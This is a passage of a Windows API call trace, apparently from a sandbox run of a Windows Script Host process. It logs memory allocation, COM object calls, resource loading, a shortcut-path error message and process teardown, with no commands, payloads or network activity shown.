	[0058.954] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2bf548 | out: ppv=0x2bf548*=0x40f420) returned 0x0
	[0058.955] MulDiv (nNumber=905, nNumerator=100, nDenominator=3498) returned 26
	[0058.955] IUnknown:Release (This=0x40f420) returned 0x1
	[0058.955] GetTickCount () returned 0x1f94c
	[0058.956] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2c12d8 | out: ppv=0x2c12d8*=0x40f420) returned 0x0
	[0058.958] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2bd478 | out: ppv=0x2bd478*=0x40f420) returned 0x0
	[0058.958] MulDiv (nNumber=1200, nNumerator=100, nDenominator=3704) returned 32
	[0058.958] IUnknown:Release (This=0x40f420) returned 0x1
	[0058.958] GetTickCount () returned 0x1f94c
	[0058.959] malloc (_Size=0x508) returned 0xdb120
	[0058.959] realloc (_Block=0x1450a0, _Size=0x80) returned 0xebcd0
	[0058.959] realloc (_Block=0xcee60, _Size=0x500) returned 0xdb630
	[0058.959] malloc (_Size=0xa08) returned 0x103000
	[0058.971] realloc (_Block=0xebcd0, _Size=0x100) returned 0x16bbf0
	[0058.971] realloc (_Block=0xdb630, _Size=0xa00) returned 0x104e30
	[0058.971] malloc (_Size=0x1408) returned 0x113000
	[0058.971] realloc (_Block=0x16bbf0, _Size=0x200) returned 0x14bd60
	[0058.971] realloc (_Block=0x104e30, _Size=0x1400) returned 0x114410
	[0058.971] malloc (_Size=0x2808) returned 0x166980
	[0058.972] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2bd478 | out: ppv=0x2bd478*=0x40f420) returned 0x0
	[0058.972] ??3@YAXPEAX@Z () returned 0x5b01400001
	[0058.972] ??3@YAXPEAX@Z () returned 0x5c00a10001
	[0058.975] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2bd478 | out: ppv=0x2bd478*=0x40f420) returned 0x0
	[0058.975] MulDiv (nNumber=987, nNumerator=100, nDenominator=3526) returned 28
	[0058.975] IUnknown:Release (This=0x40f420) returned 0x1
	[0058.975] GetTickCount () returned 0x1f95b
	[0058.977] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2bb6e8 | out: ppv=0x2bb6e8*=0x40f420) returned 0x0
	[0058.977] ??3@YAXPEAX@Z () returned 0x1
	[0058.977] ??3@YAXPEAX@Z () returned 0x3c500cb0001
	[0058.979] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2bb6e8 | out: ppv=0x2bb6e8*=0x40f420) returned 0x0
	[0058.979] ??3@YAXPEAX@Z () returned 0x3900de0001
	[0058.980] MulDiv (nNumber=990, nNumerator=100, nDenominator=3584) returned 28
	[0058.980] IUnknown:Release (This=0x40f420) returned 0x1
	[0058.980] GetTickCount () returned 0x1f95b
	[0058.981] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2bd478 | out: ppv=0x2bd478*=0x40f420) returned 0x0
	[0058.984] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2bd478 | out: ppv=0x2bd478*=0x40f420) returned 0x0
	[0058.985] MulDiv (nNumber=965, nNumerator=100, nDenominator=3656) returned 26
	[0058.985] IUnknown:Release (This=0x40f420) returned 0x1
	[0058.985] GetTickCount () returned 0x1f95b
	[0058.986] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2bb6e8 | out: ppv=0x2bb6e8*=0x40f420) returned 0x0
	[0058.989] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2c12d8 | out: ppv=0x2c12d8*=0x40f420) returned 0x0
	[0058.990] MulDiv (nNumber=1006, nNumerator=100, nDenominator=3715) returned 27
	[0058.990] IUnknown:Release (This=0x40f420) returned 0x1
	[0058.990] GetTickCount () returned 0x1f96b
	[0058.992] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2c12d8 | out: ppv=0x2c12d8*=0x40f420) returned 0x0
	[0058.992] ??3@YAXPEAX@Z () returned 0x1
	[0058.992] ??3@YAXPEAX@Z () returned 0x15200800001
	[0058.995] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2bb6e8 | out: ppv=0x2bb6e8*=0x40f420) returned 0x0
	[0058.995] MulDiv (nNumber=1200, nNumerator=100, nDenominator=3758) returned 32
	[0058.995] IUnknown:Release (This=0x40f420) returned 0x1
	[0058.995] GetTickCount () returned 0x1f96b
	[0058.997] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2bd668 | out: ppv=0x2bd668*=0x40f420) returned 0x0
	[0058.997] ??3@YAXPEAX@Z () returned 0x1
	[0058.997] ??3@YAXPEAX@Z () returned 0x59700e90001
	[0059.051] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2bb6e8 | out: ppv=0x2bb6e8*=0x40f420) returned 0x0
	[0059.052] MulDiv (nNumber=979, nNumerator=100, nDenominator=3579) returned 27
	[0059.052] IUnknown:Release (This=0x40f420) returned 0x1
	[0059.052] GetTickCount () returned 0x1f9a9
	[0059.054] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2b9808 | out: ppv=0x2b9808*=0x40f420) returned 0x0
	[0059.054] ??3@YAXPEAX@Z () returned 0x1
	[0059.054] ??3@YAXPEAX@Z () returned 0x62b009b0001
	[0059.166] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2adce8 | out: ppv=0x2adce8*=0x40f420) returned 0x0
	[0059.167] free (_Block=0x175b50) 
	[0059.167] ??3@YAXPEAX@Z () returned 0x200400001
	[0059.167] ??3@YAXPEAX@Z () returned 0x100140001
	[0059.167] free (_Block=0xec8a0) 
	[0059.167] free (_Block=0x16d240) 
	[0059.167] ??3@YAXPEAX@Z () returned 0x1005a0001
	[0059.167] ??3@YAXPEAX@Z () returned 0x201360001
	[0059.168] MulDiv (nNumber=1015, nNumerator=100, nDenominator=3610) returned 28
	[0059.168] IUnknown:Release (This=0x40f420) returned 0x1
	[0059.168] GetTickCount () returned 0x1fa16
	[0059.174] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x286d28 | out: ppv=0x286d28*=0x40f420) returned 0x0
	[0059.182] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x238da8 | out: ppv=0x238da8*=0x40f420) returned 0x0
	[0059.183] free (_Block=0x183d80) 
	[0059.183] ??3@YAXPEAX@Z () returned 0xf00640001
	[0059.183] ??3@YAXPEAX@Z () returned 0xe00800001
	[0059.183] free (_Block=0x180a90) 
	[0059.183] free (_Block=0x186970) 
	[0059.183] ??3@YAXPEAX@Z () returned 0x101150001
	[0059.183] ??3@YAXPEAX@Z () returned 0x1009c0001
	[0059.183] MulDiv (nNumber=960, nNumerator=100, nDenominator=3660) returned 26
	[0059.183] IUnknown:Release (This=0x40f420) returned 0x1
	[0059.183] GetTickCount () returned 0x1fa26
	[0059.187] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x20df88 | out: ppv=0x20df88*=0x40f420) returned 0x0
	[0059.192] _resetstkoflw () returned 0x1
	[0059.193] FindResourceA (hModule=0x7fee1590000, lpName=0x2, lpType=0x6) returned 0x500718
	[0059.193] LoadResource (hModule=0x7fee1590000, hResInfo=0x500718) returned 0x500b6c
	[0059.193] LockResource (hResData=0x500b6c) returned 0x500b6c
	[0059.193] SizeofResource (hModule=0x7fee1590000, hResInfo=0x500718) returned 0x86
	[0059.193] FreeResource (hResData=0x500b6c) returned 0
	[0059.193] FindResourceA (hModule=0x7fee1590000, lpName=0x101, lpType=0x6) returned 0x5007e8
	[0059.193] LoadResource (hModule=0x7fee1590000, hResInfo=0x5007e8) returned 0x501c74
	[0059.193] LockResource (hResData=0x501c74) returned 0x501c74
	[0059.193] SizeofResource (hModule=0x7fee1590000, hResInfo=0x5007e8) returned 0xce
	[0059.194] FreeResource (hResData=0x501c74) returned 0
	[0059.194] GetTickCount () returned 0x1fa36
	[0059.194] bsearch (_Key=0x1e2da8, _Base=0x7fee165a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee15e81a0) returned 0x7fee165a410
	[0059.194] ??2@YAPEAX_K@Z () returned 0xc1fa0
	[0059.194] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2c1188 | out: ppv=0x2c1188*=0x40f420) returned 0x0
	[0059.195] free (_Block=0x168360) 
	[0059.195] free (_Block=0x180a00) 
	[0059.195] free (_Block=0x186860) 
	[0059.195] ??3@YAXPEAX@Z () returned 0x1
	[0059.195] ??3@YAXPEAX@Z () returned 0x1
	[0059.195] free (_Block=0x168320) 
	[0059.195] ??3@YAXPEAX@Z () returned 0x1000800001
	[0059.195] free (_Block=0x180970) 
	[0059.195] free (_Block=0x17d750) 
	[0059.195] free (_Block=0x186750) 
	[0059.195] ??3@YAXPEAX@Z () returned 0x1000ff0001
	[0059.195] ??3@YAXPEAX@Z () returned 0x5001d20001
	[0059.195] free (_Block=0x1808e0) 
	[0059.195] free (_Block=0x17d960) 
	[0059.195] free (_Block=0x186640) 
	[0059.195] ??3@YAXPEAX@Z () returned 0x1100f40001
	[0059.195] ??3@YAXPEAX@Z () returned 0x1
	[0059.196] free (_Block=0x1617c0) 
	[0059.196] ??3@YAXPEAX@Z () returned 0x1
	[0059.196] free (_Block=0xec9c0) 
	[0059.196] free (_Block=0x14e490) 
	[0059.196] free (_Block=0x16d460) 
	[0059.196] ??3@YAXPEAX@Z () returned 0x1
	[0059.196] ??3@YAXPEAX@Z () returned 0x51011a0001
	[0059.196] free (_Block=0xec930) 
	[0059.196] free (_Block=0x14e6a0) 
	[0059.196] free (_Block=0x16d350) 
	[0059.196] ??3@YAXPEAX@Z () returned 0x11004f0001
	[0059.196] ??3@YAXPEAX@Z () returned 0x1b00f70001
	[0059.196] free (_Block=0x1682e0) 
	[0059.196] free (_Block=0x1807c0) 
	[0059.196] free (_Block=0x186420) 
	[0059.196] ??3@YAXPEAX@Z () returned 0x1200e90001
	[0059.196] ??3@YAXPEAX@Z () returned 0x1100720001
	[0059.196] free (_Block=0x1615c0) 
	[0059.196] ??3@YAXPEAX@Z () returned 0xe01280001
	[0059.196] free (_Block=0xec150) 
	[0059.196] free (_Block=0x14d410) 
	[0059.196] free (_Block=0x16c470) 
	[0059.197] ??3@YAXPEAX@Z () returned 0x1
	[0059.197] ??3@YAXPEAX@Z () returned 0x5200620001
	[0059.197] free (_Block=0x161780) 
	[0059.197] free (_Block=0xec810) 
	[0059.197] free (_Block=0x16d130) 
	[0059.197] ??3@YAXPEAX@Z () returned 0x1200440001
	[0059.197] ??3@YAXPEAX@Z () returned 0xf008e0001
	[0059.197] free (_Block=0x1682a0) 
	[0059.197] ??3@YAXPEAX@Z () returned 0x1200560001
	[0059.197] free (_Block=0x180730) 
	[0059.197] free (_Block=0x17d330) 
	[0059.197] free (_Block=0x186310) 
	[0059.197] ??3@YAXPEAX@Z () returned 0x1300d30001
	[0059.197] ??3@YAXPEAX@Z () returned 0x53002a0001
	[0059.197] free (_Block=0x1806a0) 
	[0059.197] free (_Block=0x17d540) 
	[0059.197] free (_Block=0x186200) 
	[0059.197] ??3@YAXPEAX@Z () returned 0x1400c80001
	[0059.197] ??3@YAXPEAX@Z () returned 0x1c00250001
	[0059.198] free (_Block=0x161740) 
	[0059.198] ??3@YAXPEAX@Z () returned 0x10010c0001
	[0059.198] free (_Block=0xec780) 
	[0059.198] free (_Block=0x14e070) 
	[0059.198] free (_Block=0x16d020) 
	[0059.198] ??3@YAXPEAX@Z () returned 0x13002e0001
	[0059.198] ??3@YAXPEAX@Z () returned 0x5401120001
	[0059.198] free (_Block=0xec6f0) 
	[0059.198] free (_Block=0x14e280) 
	[0059.198] free (_Block=0x16cf10) 
	[0059.198] ??3@YAXPEAX@Z () returned 0x1400230001
	[0059.198] ??3@YAXPEAX@Z () returned 0x1d00f00001
	[0059.198] free (_Block=0x168260) 
	[0059.198] free (_Block=0x180580) 
	[0059.198] free (_Block=0x185fe0) 
	[0059.198] ??3@YAXPEAX@Z () returned 0x1500bd0001
	[0059.198] ??3@YAXPEAX@Z () returned 0x1300480001
	[0059.198] free (_Block=0x161700) 
	[0059.199] free (_Block=0xec5d0) 
	[0059.199] free (_Block=0x16ccf0) 
	[0059.199] ??3@YAXPEAX@Z () returned 0x1500180001
	[0059.199] ??3@YAXPEAX@Z () returned 0x1100fe0001
	[0059.199] free (_Block=0x168220) 
	[0059.199] ??3@YAXPEAX@Z () returned 0x14002c0001
	[0059.199] free (_Block=0x1804f0) 
	[0059.199] free (_Block=0x17cf10) 
	[0059.199] free (_Block=0x185ed0) 
	[0059.199] ??3@YAXPEAX@Z () returned 0x1600a70001
	[0059.199] ??3@YAXPEAX@Z () returned 0x55005a0001
	[0059.199] free (_Block=0x180460) 
	[0059.199] free (_Block=0x17d120) 
	[0059.199] free (_Block=0x185dc0) 
	[0059.199] ??3@YAXPEAX@Z () returned 0x17009c0001
	[0059.199] ??3@YAXPEAX@Z () returned 0x1e001e0001
	[0059.199] free (_Block=0x1616c0) 
	[0059.199] ??3@YAXPEAX@Z () returned 0x1200e20001
	[0059.199] free (_Block=0xec540) 
	[0059.199] free (_Block=0x14dc50) 
	[0059.199] free (_Block=0x16cbe0) 
	[0059.199] ??3@YAXPEAX@Z () returned 0x801990001
	[0059.200] ??3@YAXPEAX@Z () returned 0x56010a0001
	[0059.200] free (_Block=0xec4b0) 
	[0059.200] free (_Block=0x14de60) 
	[0059.200] free (_Block=0x16cad0) 
	[0059.200] ??3@YAXPEAX@Z () returned 0x901f10001
	[0059.200] ??3@YAXPEAX@Z () returned 0x1f00e90001
	[0059.200] free (_Block=0x1681e0) 
	[0059.200] free (_Block=0x180340) 
	[0059.200] free (_Block=0x185ba0) 
	[0059.200] ??3@YAXPEAX@Z () returned 0x1800910001
	[0059.200] ??3@YAXPEAX@Z () returned 0x15001e0001
	[0059.200] free (_Block=0x1681a0) 
	[0059.200] ??3@YAXPEAX@Z () returned 0x1
	[0059.200] free (_Block=0x1802b0) 
	[0059.200] free (_Block=0x17caf0) 
	[0059.200] free (_Block=0x185a90) 
	[0059.200] ??3@YAXPEAX@Z () returned 0x19007b0001
	[0059.200] ??3@YAXPEAX@Z () returned 0x57001a0001
	[0059.330] free (_Block=0x180220) 
	[0059.330] free (_Block=0x17cd00) 
	[0059.330] free (_Block=0x185980) 
	[0059.330] ??3@YAXPEAX@Z () returned 0x1a00700001
	[0059.330] ??3@YAXPEAX@Z () returned 0x2000170001
	[0059.330] free (_Block=0x162500) 
	[0059.330] free (_Block=0x180100) 
	[0059.330] free (_Block=0x185760) 
	[0059.330] ??3@YAXPEAX@Z () returned 0x1b00650001
	[0059.330] ??3@YAXPEAX@Z () returned 0xe01ec0001
	[0059.330] free (_Block=0x1624c0) 
	[0059.331] ??3@YAXPEAX@Z () returned 0xf01d00001
	[0059.331] free (_Block=0x180070) 
	[0059.331] free (_Block=0x17c6d0) 
	[0059.331] free (_Block=0x185650) 
	[0059.331] ??3@YAXPEAX@Z () returned 0x1c004f0001
	[0059.331] ??3@YAXPEAX@Z () returned 0x5801020001
	[0059.331] free (_Block=0x17ffe0) 
	[0059.331] free (_Block=0x17c8e0) 
	[0059.331] free (_Block=0x17b410) 
	[0059.331] ??3@YAXPEAX@Z () returned 0x1d00440001
	[0059.331] ??3@YAXPEAX@Z () returned 0x2100e20001
	[0059.331] free (_Block=0x162480) 
	[0059.331] free (_Block=0x17fec0) 
	[0059.331] free (_Block=0x17b1f0) 
	[0059.331] ??3@YAXPEAX@Z () returned 0x1e00390001
	[0059.331] ??3@YAXPEAX@Z () returned 0x1001c20001
	[0059.331] free (_Block=0x162440) 
	[0059.331] ??3@YAXPEAX@Z () returned 0x1101a60001
	[0059.331] free (_Block=0x17fe30) 
	[0059.331] free (_Block=0x17c2b0) 
	[0059.331] free (_Block=0x17b0e0) 
	[0059.331] ??3@YAXPEAX@Z () returned 0x1f00230001
	[0059.332] ??3@YAXPEAX@Z () returned 0x5900fa0001
	[0059.332] free (_Block=0x17fda0) 
	[0059.332] free (_Block=0x17c4c0) 
	[0059.332] free (_Block=0x17afd0) 
	[0059.332] ??3@YAXPEAX@Z () returned 0x2000180001
	[0059.332] ??3@YAXPEAX@Z () returned 0x2200db0001
	[0059.332] free (_Block=0x162400) 
	[0059.332] free (_Block=0x17fc80) 
	[0059.332] free (_Block=0x17adb0) 
	[0059.332] ??3@YAXPEAX@Z () returned 0x1
	[0059.332] ??3@YAXPEAX@Z () returned 0x1201980001
	[0059.332] free (_Block=0x1623c0) 
	[0059.332] ??3@YAXPEAX@Z () returned 0x13017c0001
	[0059.332] free (_Block=0x17fbf0) 
	[0059.332] free (_Block=0x17be90) 
	[0059.333] free (_Block=0x17aca0) 
	[0059.333] ??3@YAXPEAX@Z () returned 0x1001f10001
	[0059.333] ??3@YAXPEAX@Z () returned 0x5a00f20001
	[0059.333] free (_Block=0x17fb60) 
	[0059.333] free (_Block=0x17c0a0) 
	[0059.333] free (_Block=0x17ab90) 
	[0059.333] ??3@YAXPEAX@Z () returned 0x1101e60001
	[0059.333] ??3@YAXPEAX@Z () returned 0x2300d40001
	[0059.342] MulDiv (nNumber=1020, nNumerator=100, nDenominator=3589) returned 28
	[0059.342] IUnknown:Release (This=0x40f420) returned 0x1
	[0059.342] GetTickCount () returned 0x1fab2
	[0059.347] CreateErrorInfo (in: pperrinfo=0x2cba80 | out: pperrinfo=0x2cba80*=0x43a658) returned 0x0
	[0059.349] CErrorObject::SetGUID () returned 0x0
	[0059.349] CErrorObject::SetSource () returned 0x0
	[0059.349] LoadStringW (in: hInstance=0x7fee31a0000, uID=0x1004, lpBuffer=0x2ca1c0, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
	[0059.349] FormatMessageW (in: dwFlags=0x500, lpSource=0x4481a8, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x2cba90, nSize=0x0, Arguments=0x2cbb00 | out: lpBuffer="\xe380\x48") returned 0x31
	[0059.349] CErrorObject::SetDescription () returned 0x0
	[0059.349] CErrorObject::SetHelpFile () returned 0x0
	[0059.349] CErrorObject::SetHelpContext () returned 0x0
	[0059.349] QueryInterface () returned 0x0
	[0059.349] SetErrorInfo (dwReserved=0x0, perrinfo=0x43a650) returned 0x0
	[0059.349] Release () returned 0x2
	[0059.350] IUnknown:Release (This=0x43a650) returned 0x1
	[0059.350] LocalFree (hMem=0x48e380) returned 0x0
	[0059.350] IUnknown:Release (This=0x48d0f0) returned 0x1
	[0059.350] bsearch (_Key=0x2ccbe8, _Base=0x7fee165a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee15e81a0) returned 0x7fee165a3e0
	[0059.350] ??2@YAPEAX_K@Z () returned 0x160470
	[0059.352] SetItemAlloc () returned 0x0
	[0059.352] Release () returned 0x1
	[0059.352] QueryInterface () returned 0x80004002
	[0059.353] QueryInterface () returned 0x80004002
	[0059.353] QueryInterface () returned 0x80004002
	[0059.353] QueryInterface () returned 0x80004002
	[0059.353] QueryInterface () returned 0x0
	[0059.353] Release () returned 0x1
	[0059.353] realloc (_Block=0x102b40, _Size=0x140) returned 0xed680
	[0059.354] MulDiv (nNumber=940, nNumerator=100, nDenominator=3520) returned 27
	[0059.354] IUnknown:Release (This=0x40f420) returned 0x1
	[0059.354] GetTickCount () returned 0x1fab2
	[0059.356] MulDiv (nNumber=942, nNumerator=100, nDenominator=3645) returned 26
	[0059.356] IUnknown:Release (This=0x40f420) returned 0x1
	[0059.356] GetTickCount () returned 0x1fab2
	[0059.357] FindResourceA (hModule=0x7fee1590000, lpName=0x2, lpType=0x6) returned 0x500718
	[0059.357] LoadResource (hModule=0x7fee1590000, hResInfo=0x500718) returned 0x500b6c
	[0059.357] LockResource (hResData=0x500b6c) returned 0x500b6c
	[0059.357] SizeofResource (hModule=0x7fee1590000, hResInfo=0x500718) returned 0x86
	[0059.357] FreeResource (hResData=0x500b6c) returned 0
	[0059.357] FindResourceA (hModule=0x7fee1590000, lpName=0x101, lpType=0x6) returned 0x5007e8
	[0059.357] LoadResource (hModule=0x7fee1590000, hResInfo=0x5007e8) returned 0x501c74
	[0059.357] LockResource (hResData=0x501c74) returned 0x501c74
	[0059.357] SizeofResource (hModule=0x7fee1590000, hResInfo=0x5007e8) returned 0xce
	[0059.357] FreeResource (hResData=0x501c74) returned 0
	[0059.358] bsearch (_Key=0x1e2da8, _Base=0x7fee165a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee15e81a0) returned 0x7fee165a410
	[0059.802] Release () returned 0x1
	[0059.803] GetCurrentThreadId () returned 0xa1c
	[0059.803] CDebugEventFire::IsActive () returned 0x1
	[0059.803] GetCurrentThreadId () returned 0xa1c
	[0059.803] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.803] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.803] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.804] free (_Block=0xc1730) 
	[0059.804] free (_Block=0xc2310) 
	[0059.804] free (_Block=0x668600) 
	[0059.804] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.804] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.805] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.805] free (_Block=0xc0a90) 
	[0059.805] free (_Block=0x6683e0) 
	[0059.805] ??3@YAXPEAX@Z () returned 0x3b01990001
	[0059.805] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.805] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.810] CGIPTable::RevokeInterfaceFromGlobal () returned 0x0
	[0059.810] IUnknown:Release (This=0x40f420) returned 0x1
	[0059.810] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.810] IUnknown:Release (This=0x40f420) returned 0x0
	[0059.810] free (_Block=0x18dbb0) 
	[0059.810] free (_Block=0x157d90) 
	[0059.810] ??3@YAXPEAX@Z () returned 0x67002e0001
	[0059.810] ??3@YAXPEAX@Z () returned 0x23001e0001
	[0059.810] CDebugEventFire::EndSession () returned 0x0
	[0059.810] CDebugEventFire::Release () returned 0x1
	[0059.810] GetUserDefaultLCID () returned 0x409
	[0059.810] GetACP () returned 0x4e4
	[0059.812] CDebugEventFire::Release () returned 0x0
	[0059.812] free (_Block=0x66f640) 
	[0059.812] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.812] SendMessageA (hWnd=0x701b4, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0059.815] SendMessageA (hWnd=0x701b4, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0059.815] PostMessageA (hWnd=0x701b4, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0059.817] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x2cf420*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0059.817] CloseHandle (hObject=0xd4) returned 1
	[0059.817] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.818] IUnknown:Release (This=0x41e5f0) returned 0x0
	[0059.818] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.818] IUnknown:Release (This=0x41e6a0) returned 0x0
	[0059.818] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.818] IUnknown:Release (This=0x41e750) returned 0x0
	[0059.818] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.818] IUnknown:Release (This=0x41e540) returned 0x0
	[0059.818] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.819] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.819] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.819] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.819] GetProcessHeap () returned 0x3f0000
	[0059.819] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45ae20 | out: hHeap=0x3f0000) returned 1
	[0059.819] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.819] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x2cf450 | out: lplpMessageFilter=0x2cf450*=0x665f80) returned 0x0
	[0059.819] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.819] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.819] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.819] CoUninitialize () 
	[0059.819] DllCanUnloadNow () returned 0x0
	[0059.819] DllCanUnloadNow () returned 0x0
	[0059.820] DllCanUnloadNow () returned 0x1
	[0059.820] free (_Block=0x16c9c0) 
	[0059.823] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.823] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.823] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.823] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.823] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.823] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.823] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.823] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.823] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.823] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.823] ??2@YAPEAX_K@Z () returned 0xe91b0
	[0059.823] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0059.823] ??3@YAXPEAX@Z () returned 0x27100050001
	[0059.823] ??3@YAXPEAX@Z () returned 0x5cd4d101

Thread:
	id = 113
	os_tid = 0x878


Thread:
	id = 115
	os_tid = 0x57c

	[0058.339] GetClassInfoA (in: hInstance=0xff430000, lpClassName="WSH-Timer", lpWndClass=0x64f830 | out: lpWndClass=0x64f830) returned 0
